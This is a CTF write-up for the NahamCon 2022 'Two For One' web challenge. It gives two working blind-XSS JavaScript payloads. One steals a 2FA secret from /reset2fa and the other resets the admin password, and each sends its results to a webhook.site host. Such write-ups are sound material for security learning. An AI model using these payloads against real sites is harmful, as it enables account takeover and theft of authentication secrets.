Rating: 5.0
# NahamCon CTF 2022 - Two For One
category: Web - Hard
## solution
at the first page there is a login and signup page
in the signup page we must get the google auth token cuz we need it for login and other stuffs.
after login we could see that we are able to create secrets
but the goal is not creating notes, we have to somehow read admin notes
so we will go to settings
in settings we could see Feedback part which after some fuzzing we found it's vulnerable to blind xss
but there are two more part in settings
## reset password
and
## reset 2FA
we found there is no csrf for reset password and reset 2FA, but reset password need to confirming 2FA. so first of all we have to somehow hijack the google authentication token.
we could reset google auth with POST request to this endpoint ```/reset2fa```
I wrote below payload to hijack the result of ```/reset2fa``` and send it to our webhook
```js
<script>
xhr = new XMLHttpRequest();
xhr.open('POST', 'http://challenge.nahamcon.com:31170/reset2fa', false);
xhr.send();
document.location='https://webhook.site/x4xx4-xxx-xxx-xxxx-xxxx?otp='+xhr.response;
</script>
```
## result
now we have secret token. we should convert it to QR code
got it and scaned with my phone, now I have the google auth
the next step is reseting admin password.
I wrote below payload to reset admin password
```js
<script>
xhr = new XMLHttpRequest();
xhr.open('POST', 'http://challenge.nahamcon.com:31170/reset_password', false);
xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xhr.send(JSON.stringify({"otp":"068728","password":"a","password2":"a"}));
document.location='https://webhook.site/3xxx4-xxxx-xxxxxx-xxxxx-xxxxx?res='+xhr.response;
</script>
```
and got ```{"success":true}``` in my webhook response.
now I can login with admin creds which it's username is ```admin``` and password is ```a``` (what we changed) and the google auth.
logged in and we are able to read the flag from admin's secrets
Really interesting challnege . thanks @congon4tor#2334
